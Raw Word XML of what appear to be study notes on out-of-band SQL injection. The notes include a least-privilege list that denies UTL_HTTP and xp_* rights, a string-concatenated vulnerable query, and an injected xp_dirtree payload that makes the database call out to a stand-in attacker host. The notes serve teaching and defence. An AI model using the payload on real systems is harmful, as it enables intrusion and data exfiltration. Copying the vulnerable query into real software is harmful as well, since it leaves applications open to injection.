          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Least-privilege DB users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F3A652" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>Application DB account must NOT have:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E407FB7" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>• sysadmin</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t>• network access</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t>• file system procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t xml:space="preserve">• UTL_HTTP / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>xp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>_* rights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7066ED" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:pict w14:anchorId="6E8CE5BA">
          <v:rect id="_x0000_i1100" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42294499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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lab-style proof of concept (for learning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44398BC1" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerable query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB353B6" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve">query = "SELECT name FROM users WHERE id = " + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>user_input</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="709F5CD5" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Injected payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB950FD" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve">1; EXEC </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>master..</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>xp_dirtree</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve"> '\\test.attacker.com\share'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C64CC41" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t>Your DNS server receives → test.attacker.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FCCB5B" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>Injection confirmed without any page output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A12318E" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:pict w14:anchorId="2E55F99F">
          <v:rect id="_x0000_i1101" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27040A13" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Key takeaway from the video</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61034D8C" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve">Routed queries turn the database into a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>communication channel</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C2DB1C" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>Even if:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t>• errors are hidden</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t>• results are blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t>• pages look secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5CA68E" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>Your database might still be leaking data externally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6651665B" w14:textId="05F6184D" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7428"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="704D1B4A" w14:textId="2256559D" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:pStyle w:val="Heading1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26DA3A98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249"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D2E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5D97"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="825C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E6D81"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D7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86EC7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="344E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329806">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1419014154">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1476801402">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1208685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55"/>
    <w:rsid w:val="00024902"/>
    <w:rsid w:val="002F7EEA"/>
    <w:rsid w:val="00510EF4"/>
    <w:rsid w:val="00606611"/>
    <w:rsid w:val="00C722A3"/>
    <w:rsid w:val="00D42D55"/>
    <w:rsid w:val="00F7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B063"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{088F28D7-39D6-44DB-A51D-BBDFEDEB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55"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00D4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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-15T17:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-15T17:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>